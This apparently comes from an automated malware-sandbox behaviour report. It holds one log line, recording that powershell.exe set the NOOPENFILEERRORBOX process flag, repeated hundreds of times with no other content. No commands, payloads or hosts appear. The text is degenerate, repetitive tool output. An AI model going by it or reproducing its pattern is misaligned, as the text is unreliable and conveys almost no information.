Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
